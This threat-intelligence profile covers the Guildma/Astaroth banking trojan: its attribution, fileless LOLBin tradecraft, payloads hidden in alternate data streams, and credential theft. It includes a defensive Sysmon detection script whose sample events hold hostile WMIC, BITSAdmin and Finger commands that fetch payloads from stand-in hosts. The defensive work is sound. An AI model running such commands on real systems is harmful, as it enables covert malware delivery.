Threat Actor

Guildma / Astaroth

guildma_astaroth · latin_america_brazilian_organized_cybercrime · active since 2015

Guildma / Astaroth is the industry's dual name for one malware family: Avast tracks it as Guildma and Cybereason as Astaroth. Avast researcher Adolf Streda's 2019 analysis settled the naming question, describing Guildma as "almost certainly the same malware as that described by Cybereason as Astaroth, but analyzed here in greater detail".

It is a Brazilian-origin, highly modular banking trojan that also functions as a Remote Access Tool (RAT), spyware, password stealer and information stealer. It has been active since at least 2015: Avast estimates that the "first versions of Guildma were created in 2015", and one of the seeds used to derive its module-encryption keys has not changed since late 2015. From a Brazil-only start it has expanded across Latin America and into the US, Spain and Portugal. Avast detected roughly 155,000 infection attempts in 2019; 98% of them were still in Brazil, but the malware's targets had grown to about 130 banks and web services worldwide, including Netflix, Facebook, Amazon and Google Mail.

It is tracked as a standalone malware platform cluster, alongside Grandoreiro and Mekotio, in the Latin American banking trojan operators cell.

Attribution to Brazilian organized cybercrime rests on four bodies of reporting: Kaspersky Securelist's "The Tetrade: Brazilian banking malware goes global" (Fabio Assolini, July 14, 2020), which classifies Guildma with Javali, Melcoz and Grandoreiro as the four major Brazilian banking trojan families; the Microsoft Defender ATP Research Team's July 9, 2019 disclosure of a fileless Astaroth campaign that, in the words of Microsoft Security Intelligence (@MsftSecIntel), "completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory"; Cybereason's 2019 Astaroth analysis; and Cofense PDC's September 2018 disclosure of a South American campaign that compromised roughly 8,000 machines within a single week.

Fileless, living-off-the-land execution is the cluster-defining tradecraft. The LOLBin arsenal includes WMIC (Windows Management Instrumentation Command-line), whose /Format parameter is pointed at a remote XSL stylesheet so that the JavaScript embedded in it executes, per Microsoft ATP; BITSAdmin, an allowlisted Windows tool the operators relied on for years to download additional modules without triggering detection, per Kaspersky; ExtExport, a legitimate utility abused to load malicious DLLs; Finger, a Windows utility used for remote code execution, per Tempest SideChannel 2021; and, historically, aswrundll.exe, an Avast binary whose abuse Avast has since blocked.

NTFS Alternate Data Streams (ADS) payload concealment is also cluster-defining. Per Kaspersky's November 2019 disclosure, payloads are stored in alternate data streams of desktop.ini, so the files do not appear in Windows Explorer; on the command line they are only visible with DIR /R.
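The two cluster-defining techniques above, the LOLBin command lines and the desktop.ini ADS drop, both leave telemetry that is straightforward to hunt for. The following is an added detection example written for this page; it is not code from Avast, Kaspersky, Microsoft or Tempest, and it is not one of the platform's own Sigma rules. It runs a handful of rules over constructed Sysmon-style records (EventID 1 process creation, EventID 15 file stream creation). The event records, file paths, hostnames (an .invalid domain and a TEST-NET address), and the rule names are assumptions made for the example; the ATT&CK IDs are the standard technique IDs for XSL Script Processing (T1220), BITS Jobs (T1197), DLL Search Order Hijacking (T1574.001), Ingress Tool Transfer (T1105, used here for the finger download) and NTFS File Attributes (T1564.004).

```python
"""Added example: hunting Guildma/Astaroth LOLBin and NTFS ADS tradecraft in
Sysmon-style telemetry. All events below are constructed for illustration."""
import re
from dataclasses import dataclass

# WMIC /format pointed at a remote XSL (the JavaScript-in-XSL trick).
WMIC_REMOTE_XSL = re.compile(r'/format\s*:\s*"?https?://', re.IGNORECASE)
# BITSAdmin transfer or addfile with a remote URL as the source.
BITS_REMOTE = re.compile(r"/(transfer|addfile)\b.*https?://", re.IGNORECASE)
# A Sysmon EventID 15 TargetFilename for an ADS looks like C:\dir\file.ext:stream
ADS_STREAM = re.compile(r"^[A-Za-z]:\\(?P<path>.*?):(?P<stream>[^\\:]+)$")
# Streams Windows writes routinely; anything else is worth a look.
BENIGN_STREAMS = {"zone.identifier"}


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str  # ATT&CK technique ID
    detail: str


def image_name(record):
    """Basename of the Image field, lower-cased, e.g. 'wmic.exe'."""
    return record.get("Image", "").rsplit("\\", 1)[-1].lower()


def check_process_create(record):
    """EventID 1 rules: the LOLBins Guildma/Astaroth is documented abusing."""
    name = image_name(record)
    cmd = record.get("CommandLine", "")
    if name == "wmic.exe" and WMIC_REMOTE_XSL.search(cmd):
        return Alert("wmic_remote_xsl", "T1220", cmd)
    if name == "bitsadmin.exe" and BITS_REMOTE.search(cmd):
        return Alert("bitsadmin_download", "T1197", cmd)
    if name == "extexport.exe":  # IE utility; essentially never run by users
        return Alert("extexport_dll_load", "T1574.001", cmd)
    if name == "finger.exe":  # legacy client; any execution is rare
        return Alert("finger_lolbin", "T1105", cmd)
    return None


def check_stream_create(record):
    """EventID 15 rule: an alternate data stream written to a file."""
    match = ADS_STREAM.match(record.get("TargetFilename", ""))
    if not match or match.group("stream").lower() in BENIGN_STREAMS:
        return None
    path = match.group("path").lower()
    rule = "desktop_ini_ads_payload" if path.endswith("desktop.ini") else "unexpected_ads"
    return Alert(rule, "T1564.004", record["TargetFilename"])


def scan(records):
    """Run the rules over a list of Sysmon-style dicts; return alerts in order."""
    alerts = []
    for record in records:
        event_id = record.get("EventID")
        if event_id == 1:
            hit = check_process_create(record)
        elif event_id == 15:
            hit = check_stream_create(record)
        else:
            hit = None
        if hit is not None:
            alerts.append(hit)
    return alerts


# Constructed sample telemetry (not real captures); paths and hosts are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"https://cdn.example.invalid/v.xsl"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high "
                    r"https://203.0.113.10/m.bin C:\Users\Public\Libraries\m.bin"},
    {"EventID": 1, "Image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "CommandLine": r"ExtExport.exe C:\Users\Public\Libraries mozilla"},
    {"EventID": 1, "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger user@203.0.113.10"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption"},  # benign: local query, no remote /format
    {"EventID": 15, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "TargetFilename": r"C:\Users\Public\Libraries\desktop.ini:module.dll"},
    {"EventID": 15, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\bob\Downloads\report.pdf:Zone.Identifier"},  # benign
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.technique}] {alert.rule}: {alert.detail}")
```

On the five constructed malicious records the scan raises one alert each and stays silent on the local WMIC query and the browser's Zone.Identifier stream. The desktop.ini rule keys on the file name the reporting describes, but the catch-all `unexpected_ads` rule is the one that matters operationally: once a family is known to hide payloads in ADS, filtering on the single file name it used last year is brittle, so alert on every non-Zone.Identifier stream and tune the benign set from your own baseline.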

Cloud-hosting C2 abuse is a further cluster-defining trait: CloudFlare Workers, Amazon AWS, YouTube channels and Facebook pages are used to host payloads and to conceal C2 information, per Kaspersky.

The malware binary is launched through DLL Search Order Hijacking and runs via process hollowing inside svchost.exe, per Kaspersky.

Phishing is multi-language: Spanish, Portuguese and English spearphishing carrying LNK, VBS, ZIP and HTML/JavaScript attachments, including COVID-19 lures ("Purchase invoice for alcohol gel: Guildma's trick for luring victims", per Kaspersky).

Newer Guildma versions seen in 2020 use a DGA that generates roughly 200 or more URLs per day on generic TLDs, per Kaspersky.

Anti-analysis is comprehensive: anti-debugging, anti-virtualization, anti-emulation and detection of security tools (OllyDbg, WinDbg, Process Hacker, Process Monitor, Wireshark), with a forced machine reboot when one is found, per Tempest.

Credential theft is equally broad: banking credentials harvested through fake pop-up overlays, browser password stores, SSH credentials and email credentials, exfiltrated by HTTPS POST to the C2, per Armor.

Tempest SideChannel additionally disclosed in 2021 that XSS-vulnerable websites were being exploited as the initial payload delivery mechanism in roughly 10% of late-January 2021 Astaroth campaigns.

The code is written in Delphi, typical of Latin American banking trojans, and descends from open-source RATs (Delphi Remote Access PC, AmigoRAT, PureRAT), per Avast.

Development is continuous, with Avast counting more than 140 versions by 2019, and the Kaspersky Tetrade framework records targeting extended to Chile, Uruguay, Peru, Ecuador, Colombia, China and Europe.

Within the Latin American banking trojan operators cell, this cluster occupies the position most defined by fileless and LOLBin tradecraft.

It is the canonical illustration of fileless execution, LOLBin abuse, NTFS ADS payload concealment, cloud-hosting C2 abuse and the Tetrade framework, and is cited in essentially all subsequent fileless-malware, LOLBin-abuse and Latin American banking trojan industry analyses across the 2015-2026 period.

Attribution: latin_america_brazilian_organized_cybercrime · confidence: high · 12 aliases
Sigma rules: 201 · YARA rules: 0 · Live IOCs: 0 · CVEs exploited: 0

Profile

Guildma / Astaroth (the dual industry name: Avast's Guildma and Cybereason's Astaroth, confirmed the same family by Avast's 2019 analysis) is a Brazilian-origin, highly modular banking trojan, RAT, spyware, password stealer and information stealer active since at least 2015. Operating regions:
  • Brazil
  • Latin America
  • US, Spain and Portugal (global expansion after the 2015 Brazil-only origin)

Attribution to Brazilian organized cybercrime rests on the Kaspersky Tetrade framework classification of July 2020 (alongside Javali, Melcoz and Grandoreiro), Avast's 2019 dual-naming clarification and the Microsoft Defender ATP Research Team's July 9, 2019 fileless Astaroth campaign disclosure. The cluster is a standalone malware platform paralleling Grandoreiro and Mekotio in the Latin American banking trojan operators cell.

Cluster-defining and signature operational tradecraft:
  • (1) Fileless infection chain (cluster-defining). Per Microsoft Defender ATP, the campaign "completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory."
  • (2) LOLBin abuse arsenal (cluster-defining). WMIC with the /Format parameter for XSL download and JavaScript execution; BITSAdmin (allowlisted Windows tool) for additional module download; ExtExport (legitimate utility) for malicious DLL loading; Finger (per Tempest 2021) for remote code execution; historically aswrundll.exe (Avast binary, now blocked).
  • (3) NTFS Alternate Data Streams (ADS) payload concealment (cluster-defining). Per Kaspersky, payloads stored in desktop.ini ADS are hidden from Explorer; DIR /R is required to display them.
  • (4) Cloud-hosting C2 abuse (cluster-defining). CloudFlare Workers, Amazon AWS, YouTube channels and Facebook pages for payload storage and C2 information concealment.
  • (5) DLL Search Order Hijacking and process hollowing. Malicious payload executed by hollowing svchost.exe, per Kaspersky.
  • (6) Multi-language phishing. Spanish, Portuguese and English spearphishing with LNK, VBS, ZIP and HTML/JavaScript attachments.
  • (7) DGA. Roughly 200 or more URLs per day on generic TLDs in the newer 2020 Guildma versions, per Kaspersky.
  • (8) Anti-analysis (signature). Anti-debugging, anti-virtualization, anti-emulation and detection of OllyDbg, WinDbg, Process Hacker, Process Monitor and Wireshark, with a forced machine reboot on detection, per Tempest.
  • (9) Comprehensive credential theft (signature). Banking credentials via fake pop-up overlays, browser password stores, SSH credentials and email credentials.

Operational target profile per Avast 2019:
  • 155,000 infection attempts detected in 2019 alone.
  • 98% still in Brazil at the time of detection.
  • 130 banks and web services targeted, including Netflix, Facebook, Amazon and Google Mail.
  • Brazil, Mexico, US, Spain and Portugal as the primary post-2019 expansion targets.
  • Chile, Uruguay, Peru, Ecuador, Colombia, China and Europe as Tetrade framework targets.

Cluster-cell coherence:
  • Kaspersky Tetrade framework member (signature): Guildma, Javali, Melcoz, Grandoreiro.
  • Delphi origin (signature, typical of Latin American banking trojans), with open-source RAT lineage (Delphi Remote Access PC, AmigoRAT, PureRAT), per Avast.
  • COVID-19 themed phishing (signature, 2020): "Purchase invoice for alcohol gel" lure, per Kaspersky.
  • Version 140+ continuous development (signature), per Avast 2019.

The cluster fills the most-fileless-LOLBin-tradecraft position in the Latin American banking trojan operators cell.

Aliases

12 aliases: guildma, astaroth, guildma astaroth, guildma_malware, astaroth_malware, astaroth_trojan, guildma brazilian banking trojan, astaroth fileless banking trojan, guildma kaspersky tetrade member, astaroth wmic lolbin abuse, guildma astaroth ntfs ads payload concealment, guildma astaroth youtube facebook c2 abuse

Notable Campaigns

10 campaigns
  • 2022-2026: Continued Industry Tracking
  • 2021: Tempest SideChannel New Astaroth Techniques
  • 2020: Kaspersky Tetrade Framework Canonical Classification (July 2020)
  • 2019: Cybereason Canonical Astaroth Disclosure
  • 2019: Microsoft Defender ATP Fileless Canonical Disclosure (July 9, 2019)
  • 2019: Avast Canonical Dual-Naming Clarification (Adolf Streda)
  • 2019: Guildma NTFS Alternate Data Streams (ADS) Innovation (November 2019)
  • 2018: Cofense PDC South American Campaign (September 2018)
  • 2015-2026: Continued Industry Reference Status
  • 2015: Guildma Origin, Brazil-Only Targeting

Attribution & Reporting

Attributed by
  • Kaspersky GReAT (July 2020 Tetrade framework disclosure, Fabio Assolini)
  • Kaspersky Securelist (Tetrade comprehensive analysis)
  • Avast (2019 dual-naming clarification, malware researcher Adolf Streda)
  • Microsoft Defender ATP Research Team (July 9, 2019 fileless Astaroth campaign disclosure)
  • Microsoft Security Intelligence (@MsftSecIntel Twitter disclosure)
  • Cybereason (2019 Astaroth analysis)
  • Cofense Phishing Defense Center (September 2018 South American campaign disclosure)
  • Tempest SideChannel (2021 New Astaroth Techniques disclosure: Finger LOLBin and XSS exploitation)
  • ESET WeLiveSecurity (Latin American banking trojan series including Guildma coverage)
  • Armor (Astaroth banking trojan analysis)
  • SecurityWeek (Avast and Kaspersky reporting)
  • SecurityAffairs (Tetrade reporting)
  • Bleeping Computer (Microsoft fileless campaign reporting)
  • Recorded Future (Brazilian hacking scene analysis)
  • MITRE ATT&CK Software S0373 (Astaroth)
  • Malpedia Software Profile (Astaroth = Guildma)
Key reporting
  • Kaspersky GReAT (Fabio Assolini): The Tetrade, Brazilian banking malware goes global (July 14, 2020), the Tetrade framework disclosure
  • Avast (Adolf Streda): 2019 dual-naming clarification, Guildma = Astaroth analysis
  • Microsoft Defender ATP Research Team: July 9, 2019 fileless Astaroth campaign disclosure
  • Microsoft Security Intelligence (@MsftSecIntel Twitter): July 9, 2019 fileless disclosure
  • Cybereason: 2019 Astaroth analysis
  • Cofense Phishing Defense Center: September 2018 South American campaign disclosure
  • Tempest SideChannel: New Astaroth techniques focus on anti-detection measures (2021)
  • ESET WeLiveSecurity: Latin American banking trojan series
  • Armor: Astaroth banking trojan analysis (2025)
  • SecurityWeek: Guildma Malware Expands Targets Beyond Brazil (2019)
  • SecurityAffairs: Tetrade banking malware families target users worldwide
  • Bleeping Computer: Microsoft Discovers Fileless Astaroth Trojan Campaign (July 2019)
  • Recorded Future: Brazilian hacking scene analysis
  • MITRE ATT&CK Software S0373: Astaroth
  • Malpedia Software Profile: Astaroth (= Guildma)

Operational

State sponsor

No state sponsor. Guildma / Astaroth is Brazilian-origin organized cybercrime: a Latin American banking trojan operator group with sophisticated fileless and LOLBin tradecraft, operationally separate from state-sponsored APT activity. Attribution chain:

(1) Kaspersky Tetrade framework classification (2020). In "The Tetrade: Brazilian banking malware goes global" (Securelist, July 2020), Guildma is classified alongside Javali, Melcoz and Grandoreiro as one of four major Brazilian banking trojan families. Per Kaspersky: "The Brazilian cybercrime underground is recognized as the most focused on the development and commercialization of banking trojans." Guildma has been active since 2015, initially targeting Brazilian banking users only.

(2) Avast dual-naming clarification (2019). Per SecurityWeek and Avast research (Adolf Streda), Guildma "is almost certainly the same malware as that described by Cybereason as Astaroth, but analyzed here in greater detail." This resolved the Guildma = Astaroth naming question. Avast tracked 155,000 infection attempts in 2019 alone, 98% of them in Brazil. Per Avast: "We estimate that the first versions of Guildma were created in 2015"; one of the seeds used for module-encryption key generation has been unchanged since late 2015.

(3) Microsoft Defender ATP Research Team fileless disclosure (July 9, 2019). Per Microsoft Security Intelligence (@MsftSecIntel) and Bleeping Computer: "We recently unearthed a campaign that completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory."

(4) Cybereason Astaroth disclosure (2019). The first canonical Astaroth analysis, covering LOLBin abuse and observed campaigns against European and Brazilian targets.

(5) Cofense PDC South American campaign (September 2018). Per the Bleeping Computer update, Cofense's Phishing Defense Center spotted a malspam campaign distributing Astaroth in September 2018 that exclusively targeted South American victims, with roughly 8,000 machines potentially compromised within a single week.

(6) Tempest SideChannel New Astaroth Techniques (2021). Documented Astaroth/Guildma's use of the Finger Windows utility as a LOLBin and of XSS-vulnerable websites as an initial payload delivery mechanism.

(7) ESET WeLiveSecurity Latin American banking trojan series. Multi-year coverage that includes Guildma and tracks its continuous expansion and development.

Operational mission objective: information-stealing banking trojan with Remote Access Tool (RAT) capability; collection of financial credentials, sensitive browser data (passwords/credentials), SSH credentials and email credentials. Per Armor: "Information targeted by Astaroth includes financial data, sensitive browser data (passwords/ credentials), SSH, and email credentials. Upon retrieval, the information is typically encrypted, then exfiltrated via an HTTPS POST to the attacker's C2 server." The cluster fills the most-fileless-LOLBin-tradecraft position in the Latin American banking trojan operators cell.

Motivations
banking_credential_theft_brazilian_origin_capability, fileless_lolbin_tradecraft_signature_demonstration_capability, information_stealing_password_collection_capability, rat_remote_access_tool_capability_for_post_credential_access, sensitive_browser_data_ssh_email_credential_collection, cloud_hosting_c2_evasion_via_youtube_facebook_cloudflare_aws, ntfs_alternate_data_streams_payload_concealment_tradecraft, 130_plus_banks_and_web_services_global_expansion_capability

Detection Blind Spots

60 techniques
Across this actor's 60 mapped techniques, the share covered by each detection layer. Low bars are where you'd be blind if this actor targeted you.
  • Behavioral / log (Sigma): 55/60 (91%)
  • Analytics (MITRE CAR): 28/60 (46%)
  • Runtime / container (Falco): 5/60 (8%)
  • File / malware (YARA): 0/60 (0%)
  • Network (Suricata/Snort): 14/60 (23%)
  • Vuln scan (Nuclei): 0/60 (0%)

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor's mapped techniques: validate your detections against this specific adversary and cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
  • SSH and email credentials theft
  • svchost.exe process hollowing for payload execution
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin